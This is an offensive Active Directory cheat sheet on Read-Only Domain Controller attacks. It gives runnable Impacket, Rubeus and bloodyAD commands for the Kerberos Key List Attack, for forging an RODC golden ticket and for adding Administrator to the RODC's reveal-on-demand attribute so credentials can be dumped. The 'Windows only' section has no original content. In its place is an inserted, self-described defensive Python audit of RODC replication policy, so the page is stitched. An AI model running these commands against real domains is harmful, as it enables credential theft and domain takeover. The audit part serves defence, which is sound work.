Originally published by swisskyrepo: Active Directory – Read Only Domain Controller
- RODCs are an alternative to writable Domain Controllers for less secure physical locations
- An RODC holds a filtered copy of AD (LAPS and BitLocker keys are excluded)
- Any user or group specified in the managedBy attribute of an RODC has local admin access to the RODC server
RODC Golden Ticket
- You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals that are listed in the RODC’s msDS-RevealOnDemandGroup attribute and not in the RODC’s msDS-NeverRevealGroup attribute
RODC Key List Attack
Requirements:
- Impacket PR #1210 – The Kerberos Key List Attack
- krbtgt credentials of the RODC (-rodcKey)
- ID of the krbtgt account of the RODC (-rodcNo)
Exploit:
- Using Impacket

```bash
# keylistattack.py using SAMR user enumeration without filtering (-full flag)
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full

# keylistattack.py defining a target username (-t flag)
keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST

# secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
```
- Using Rubeus

```powershell
# Forge the RODC golden ticket (RODC krbtgt AES256 key and RODC number)
Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871

# Present it to a writable DC with the key list request
Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM=
```
RODC Computer Object
When you have one of the following permissions on the RODC computer object: GenericWrite, GenericAll, WriteDacl, Owns, WriteOwner, WriteProperty.
- Add a domain admin account to the RODC’s msDS-RevealOnDemandGroup attribute
- Windows/Linux:

```bash
# Get original msDS-RevealOnDemandGroup values
bloodyAD --host 10.10.10.10 -d domain.local -u username -p pass123 get object 'RODC$' --attr msDS-RevealOnDemandGroup
distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local

# Add the previous value plus the admin account (the attribute is multi-valued: set every value to keep)
bloodyAD --host 10.10.10.10 -d domain.local -u username -p pass123 set object 'RODC$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
```
- Windows only:
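The attributes named in this section (msDS-RevealOnDemandGroup, msDS-NeverRevealGroup and managedBy) are also what a defender audits to catch the change described above. The following is an added example, not code from the original page or from the tools it lists: it takes the three attributes as an LDAP client would return them and reports Tier 0 principals that become revealable (listed in reveal-on-demand and absent from never-reveal, the condition stated under RODC Golden Ticket), drift from a known-good reveal-on-demand baseline, and an unexpected managedBy value. The domain `domain.local`, the `RODC Admins` group, the Tier 0 list and both sample attribute sets are constructed; the comparison is on direct DNs only and does not expand nested group membership, which a production audit must do.

```python
# Added example (not from the original page): audit an RODC's password
# replication policy. All DNs, the domain "domain.local" and the Tier 0
# list are constructed sample values; no live LDAP query is made.

from dataclasses import dataclass

BASE = "DC=domain,DC=local"   # constructed domain
ALLOWED = f"CN=Allowed RODC Password Replication Group,CN=Users,{BASE}"
DENIED = f"CN=Denied RODC Password Replication Group,CN=Users,{BASE}"

# Tier 0 principals whose secrets must never be revealable on an RODC
# (constructed list; extend with the domain's own privileged accounts).
TIER0 = {
    f"CN=Administrator,CN=Users,{BASE}",
    f"CN=Domain Admins,CN=Users,{BASE}",
    f"CN=Enterprise Admins,CN=Users,{BASE}",
    f"CN=krbtgt,CN=Users,{BASE}",
}


def norm(dn: str) -> str:
    """Canonicalise a DN: matching is case-insensitive and ignores
    whitespace around the comma separators."""
    return ",".join(part.strip() for part in dn.split(",")).lower()


@dataclass(frozen=True)
class RodcPolicy:
    reveal_on_demand: frozenset  # msDS-RevealOnDemandGroup
    never_reveal: frozenset      # msDS-NeverRevealGroup
    managed_by: str              # managedBy: local admin on the RODC host

    @classmethod
    def from_attrs(cls, attrs: dict) -> "RodcPolicy":
        """Build from an attribute dict as an LDAP client returns it
        (multi-valued attributes as lists, single-valued as a string)."""
        return cls(
            frozenset(norm(d) for d in attrs.get("msDS-RevealOnDemandGroup", [])),
            frozenset(norm(d) for d in attrs.get("msDS-NeverRevealGroup", [])),
            norm(attrs.get("managedBy", "")),
        )


def revealable(policy: RodcPolicy) -> set:
    """Principals the RODC may cache secrets for: in reveal-on-demand and
    not in never-reveal. Direct DN comparison; nested groups not expanded."""
    return set(policy.reveal_on_demand - policy.never_reveal)


def audit(policy: RodcPolicy, baseline_reveal: set, expected_manager: str,
          tier0: set = TIER0) -> list:
    """Return finding strings; an empty list means the policy matches the
    baseline and exposes no Tier 0 principal."""
    findings = []
    t0 = {norm(d) for d in tier0}
    for dn in sorted(revealable(policy) & t0):
        findings.append(f"tier0-revealable: {dn}")
    for dn in sorted(policy.reveal_on_demand - {norm(d) for d in baseline_reveal}):
        findings.append(f"reveal-on-demand-drift: {dn}")
    if policy.managed_by != norm(expected_manager):
        findings.append(f"managedBy-drift: {policy.managed_by or '<empty>'}")
    return findings


# Constructed sample: the default policy, then the state after an
# Administrator DN has been appended to msDS-RevealOnDemandGroup.
MANAGER = f"CN=RODC Admins,OU=Groups,{BASE}"
DEFAULT_ATTRS = {
    "msDS-RevealOnDemandGroup": [ALLOWED],
    "msDS-NeverRevealGroup": [DENIED,
                              f"CN=Domain Admins,CN=Users,{BASE}",
                              f"CN=Enterprise Admins,CN=Users,{BASE}",
                              f"CN=krbtgt,CN=Users,{BASE}"],
    "managedBy": MANAGER,
}
TAMPERED_ATTRS = {**DEFAULT_ATTRS,
                  "msDS-RevealOnDemandGroup": [ALLOWED, f"CN=Administrator,CN=Users,{BASE}"]}


def run_sample() -> tuple:
    """Audit both constructed states against the default baseline."""
    clean = audit(RodcPolicy.from_attrs(DEFAULT_ATTRS), {ALLOWED}, MANAGER)
    tampered = audit(RodcPolicy.from_attrs(TAMPERED_ATTRS), {ALLOWED}, MANAGER)
    return clean, tampered


if __name__ == "__main__":
    for label, result in zip(("default", "tampered"), run_sample()):
        print(label, result or "OK")
```

Feed `from_attrs` the output of any LDAP query against the RODC computer object and run the audit on a schedule; the default state yields no findings, while the appended Administrator DN produces both a `tier0-revealable` and a `reveal-on-demand-drift` finding.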
References
- Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory – Sean Metcalf
- At the Edge of Tier Zero: The Curious Case of the RODC – Elad Shamir
- The Kerberos Key List Attack: The return of the Read Only Domain Controllers – Leandro Cuozzo